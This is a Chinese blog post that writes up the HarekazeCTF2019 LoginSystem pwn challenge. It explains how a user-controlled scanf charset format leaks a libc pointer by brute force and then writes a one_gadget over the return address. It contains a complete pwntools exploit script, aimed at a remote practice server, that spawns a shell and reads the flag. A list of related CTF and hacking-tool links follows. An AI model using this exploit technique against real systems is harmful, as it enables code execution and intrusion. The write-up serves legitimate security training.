[BUUCTF-pwn] [HarekazeCTF2019]LoginSystem

最新推荐文章于 2022-04-22 19:18:11 发布
最新推荐文章于 2022-04-22 19:18:11 发布
阅读量506 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122625034
版权

printf漏洞的fmtstr见得多了,scanf第一次见

  while ( 1 )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        puts("Create an account first.");
        printf("# of charsets: ");
        __isoc99_scanf("%lu", &v5);
        getchar();
        if ( v5 <= 0x4F )
          break;
        puts("Too big");
      }
      printf("charsets: ");
      readstr((__int64)v6, v5);
      sprintf(s, "%%79[%s]", v6);
      printf("password: ");
      v4 = __isoc99_scanf(s, s1);
      getchar();
      if ( v4 == 1 )
        break;
      puts("Invalid password");
    }
    puts("Account created. Please input password again to log in.");
    printf("password: ");
    readstr((__int64)s2, 0x4FuLL);
    if ( !strcmp(s1, s2) )
      break;
    puts("Incorrect");
  }

程序先读入一个串,作为字符集合然后用%79[XXXXXX]去读串,成功了就跳出再验证密码,相同时退出。

这里基本看不出问题,问题在于内存的中残存指针

0000| 0x7ffd7d55d600 --> 0x1 
0008| 0x7ffd7d55d608 --> 0x10 
0016| 0x7ffd7d55d610 AAAAAAAA
0024| 0x7ffd7d55d618 AAAAAAAA
0032| 0x7ffd7d55d620 --> 0x7f0aaa40ba98 --> 0x7f0aaa40b9c8 --> .....
0040| 0x7ffd7d55d628 --> 0x7ffd7d55d768 --> 0x7f0aa9e12b97 (<__libc_start_main+231>)  # 11

在输入v6的后边0x10处有个libc+n的指针,再后边是一个指向ret的栈指针

利用:

  1. 当输入A*0x10后,实然上格式化串就变成 %79[AAA + p64(0x7f0aaa40ba98)] 这个方括号实际上是个集合,也就是得输入集合内的字符才能通过。这时候需要爆破一下有哪6个字符。(遇上A属于不幸运的情况)
  2. 得到字符集后再将A每次增长1个,也就是覆盖掉1位,哪个找不着了说明哪个是最后一个,依次找到6个字符的顺序,得到libc地址
  3. 在0x40这个位置(和printf一样的偏移)偏移11 。利用这个指针用%79[A]%11$llu将one_gadget读入到ret的位置
  4. 最后输入一条正常值,密码验证通过得到shell

这个exp大意都是网上搜的,仅加了注释

from pwn import *

'''
patchelf --set-interpreter ../buuoj_2.27_amd64/ld-2.27.so pwn
patchelf --add-needed ../buuoj_2.27_amd64/libc-2.27.so pwn
'''

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 28088) 

libc_elf = ELF('../buuoj_2.27_amd64/libc-2.27.so')
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
libc_start_main_ret = 0x21b97

elf = ELF('./pwn')
context.arch = 'amd64'

def check(c, offset):
    p.sendlineafter(b"# of charsets: ", str(offset).encode())
    p.sendafter(b"charsets: ", b'A'*offset)
    p.sendafter(b"password: ", bytes([c]))
    tmp = p.recv(8, timeout=0.2)
    if tmp == b'':
        p.send(b'\x00')
        p.sendlineafter(b'password: ', b'A')
        print('ok:', offset, hex(c))
        return True
    else:
        return False
        
def leak(offset):
    v = set()
    for i in range(256):
        if i == 0x41:
            continue
        else:
            if check(i, offset):
                v.add(i)
    print('set:', v)

    address = 0
    for i in range(6):
        for j in v:
            if not check(j, offset+i+1): #+1后缺的那个就是最后一位
                address += j<<(i*8)
                v.remove(j)
                break
    print('leak:', hex(address))
    return address

#context.log_level = 'debug'
'''
0000| 0x7ffd7d55d600 --> 0x1 
0008| 0x7ffd7d55d608 --> 0x10 
0016| 0x7ffd7d55d610 AAAAAAAA
0024| 0x7ffd7d55d618 AAAAAAAA
0032| 0x7ffd7d55d620 --> 0x7f0aaa40ba98 --> 0x7f0aaa40b9c8 --> .....
0040| 0x7ffd7d55d628 --> 0x7ffd7d55d768 --> 0x7f0aa9e12b97 (<__libc_start_main+231>)  # 11
'''
# 在内存中v6+0x10位置有libc+0x61aa98 的残存指针,当输入16个A后会与指针相连,scanf变成如下形式,
# 只要输入值在以下集合内便可成功,可以确定指针含哪个字符
# scanf('%79[AAAAAAAAAA\x20\xd6\x55\x7d\xfd\x7f]')
# 然后将串依次+1,通过缺哪个字符确定字符的顺序
# 利用 offset 11的指向ret的指针将 one_gadget写到ret处
'''
gdb.attach(p)
pause()
'''

libc_base = leak(0x10) - 0x61aa98
print('libc:', hex(libc_base))

num = libc_base + one[0]
print('one:', hex(num))
payload = b'A]%11$llu'
p.sendlineafter(b"# of charsets: ", str(len(payload)).encode())
p.sendafter(b"charsets: ", payload)
p.sendlineafter(b"password: ", b'A'+str(num).encode())

p.sendlineafter(b"# of charsets: ", b'2')
p.sendlineafter(b"charsets: ", b'A')
p.sendlineafter(b"password: ", b'A')
p.sendlineafter(b"password: ", b'A')


p.sendline(b'cat /home/login/flag')
p.interactive()

石氏是时试
关注
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
NKCTF的login_system题解复现
2203_75549399的博客
04-17 662
得到的结果有复数形式,所以需要得到他的实数(我也不清楚,直接输出显示类型错误,不都是整数类型)上面的as_long().real的意思是将上面的实部数据转换进行提取,此处有点不理解。a1=[Int('a1%d'%i)for i in range(0,16)]#创建整数约束变量,一次创建多个。收获:学到了AES分辨及解密方式(但是代码是借鉴别人的的,太菜了,写不出来)可以发现应该是AES加密,而且是换了盒的AES加密,所以进行换盒操作。def __init__(self, key):#密钥扩展。
play [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列26(超详细分析)
重新启程
12-29 770
题目地址:play 本题是高手进阶区的第15题,比较有意思! 先看看题目: 后面的题目都是十颗星的难度,需要具备比较好的漏洞挖掘能力,在这些题目中我们能学到各种各样的新的姿势。 惯例先看看保护机制: [*] '/ctf/work/python/play/a642a99a83fe4e31b1bd75959e52e6a1' Arch: i386-32-little ...
BUUCTF:[HarekazeCTF2019]Easy Notes
末初的CSDN博客
07-24 1736
BUUCTF:[HarekazeCTF2019]Easy Notes
buuctf [HarekazeCTF2019]baby_rop
carol2358的博客
04-17 405
可以在程序里找到binsh,ctrl+L, 程序本身有system函数 找到rop 修改system参数为/bin/sh,然后跳转到system运行就可以了,最后加一个假的返回地址 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level...
BUUCTF--[HarekazeCTF2019]Easy Notes
qq_46263951的博客
08-07 469
<section> <h2>Get flag</h2> <p> <?php if (is_admin()) { echo "Congratulations! The flag is: <code>" . getenv('FLAG') . "</code>"; } else { echo "You are not an admin :("; } ?&gt.
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
2021-06-19-2
weixin_44617902的博客
06-19 241
06/19刷题记录 BUU+WEB+[HarekazeCTF2019]encode_and_encode 关键字 php://input 读取POST数据 JSON(JavaScript Object Notation)轻量级的数据格式。 php://filter/伪协议 复现流程: 审计代码过滤了很多伪协议通过查询发现json_decode()会自动解析unicode编码将php flag字符用Unicode编码 bp抓包修改为POST传参 { "page" : "\u0070\u0068\u
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1694
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
BUUCTF PWN题刷题记录 (未完待续)
qq_41071646的博客
08-01 2026
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一题 连上就有flag的pwn 直接 运行就有权限,。 第二题 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
[HarekazeCTF2019]Sqlite Voting
Jacob12774的博客
06-20 881
参考链接:https://www.cnblogs.com/20175211lyz/p/12264779.html 复现链接:https://buuoj.cn/challenges#[HarekazeCTF2019]Sqlite%20Voting 这里进去后发现有提供源代码,代码如下: <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_.
CTF中pwn的入门指南
信息安全专题
10-21 7006
CTF中pwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言 python 操作系统 linux操作   C语言是最基础的,当下的比赛大部分的pwn题目使用
[HarekazeCTF2019]Avatar Uploader 1
m0_63045593的博客
04-22 1196
[HarekazeCTF2019]Avatar Uploader 1 首先就是一个普通界面 常规思路看cookie 路径啥的都没有有用的信息 这个界面是可以直接登录的 题目中也给出了源码 首先 是基本的对图片的识别 最后获得flag的位置为size处也就是 getimagesize()函数的识别 在检查文件类型时,finfo_file()函数检测上传图片的类型是否是image/png 在检查文件长宽时,getimagesize() 函数用于获取图像大小及相关信息,成功将返回个数组 也就是说要finfo_
【SCI2区】白鲸算法BWO-BiTCN-BiGRU-Attention风电预测【含Matlab源码 8071期】.zip
10-01
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2023b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化-BiTCN-BiGRU-Attention风电预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化-BiTCN-BiGRU-Attention风电预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化-BiTCN-BiGRU-Attention风电预测 4.4.3 灰狼算法GWO/狼群算法WPA优化-BiTCN-BiGRU-Attention风电预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化-BiTCN-BiGRU-Attention风电预测 4.4.5 萤火虫算法FA/差分算法DE优化-BiTCN-BiGRU-Attention风电预测 4.4.6 其他优化算法优化-BiTCN-BiGRU-Attention风电预测
该课题为基于Matlab的数字水印系统。带有一个人机交互界面。方法包括DCT和DW
最新发布
10-01
该课题为基于Matlab的数字水印系统。带有一个人机交互界面。方法包括DCT和DWT。实现方式流程为_digital-watermarking
基于天勤接口和Python的开源期货实盘交易系统设计源码
10-01
该项目为开源的期货实盘交易系统,采用Python语言进行开发,并通过天勤接口实现数据交互。源码共包含21个文件,其中Python文件7个,编译后的Python字节码文件6个,YAML配置文件5个,Markdown文档2个,以及一个LICENSE文件。该系统旨在为用户提供一个高效的期货交易解决方案。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值